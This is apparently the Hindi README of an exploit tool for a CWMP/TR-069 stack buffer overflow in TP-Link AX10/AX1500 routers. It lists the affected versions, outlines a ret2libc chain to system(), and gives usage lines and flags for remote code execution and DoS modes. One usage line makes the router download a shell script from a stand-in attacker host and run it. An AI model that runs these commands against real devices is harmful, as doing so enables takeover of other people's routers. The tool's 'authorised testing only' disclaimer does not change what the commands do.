
TP-Link AX10/AX1500 CWMP बफर ओवरफ्लो RCE
CWMP (TR-069) में स्टैक-आधारित बफर ओवरफ्लो, जो रिमोट कोड निष्पादन की ओर ले जाता है।
| फ़ील्ड | मान |
|---|---|
| उत्पाद | TP-Link AX10, AX1500 |
| प्रभावित | AX10 < 1.2.1, AX1500 < 1.3.11 |
| CVSS | 8.6 (उच्च) |
| प्रकार | स्टैक बफर ओवरफ्लो |
| वेक्टर | CWMP/TR-069 (पोर्ट 7547) |
| प्रभाव | रिमोट कोड निष्पादन |
flowchart LR
A[Attacker] --> B["Malicious ACS"]
B --> C["SetParameterValues"]
C --> D["Stack Overflow"]
D --> E["Overwrite PC"]
E --> F["ret2libc"]
F --> G["system()"]
G --> H["RCE"]
यह भेद्यता cwmp प्रक्रिया द्वारा SetParameterValues SOAP अनुरोधों के प्रबंधन में है। इनपुट का उपयोग बाउंड्स जाँच के बिना बफर आकार की गणना करने के लिए किया जाता है।
शोषण:
python exploit.py <target_ip> --check-only
python exploit.py 192.168.0.1 --dos
python exploit.py 192.168.0.1 -c "wget http://attacker/shell.sh -O /tmp/s; sh /tmp/s"
कोई नहीं (मानक लाइब्रेरी का उपयोग करता है)
केवल अधिकृत सुरक्षा परीक्षण के लिए।
| फ़्लैग | विवरण | डिफ़ॉल्ट |
|---|
-p, --port | CWMP पोर्ट | 7547 |
-c, --command | RCE के लिए कमांड | कोई नहीं |
-t, --timeout | सॉकेट टाइमआउट | 10 |
--dos | केवल DoS मोड | बंद |
--check-only | भेद्यता की जाँच करें | बंद |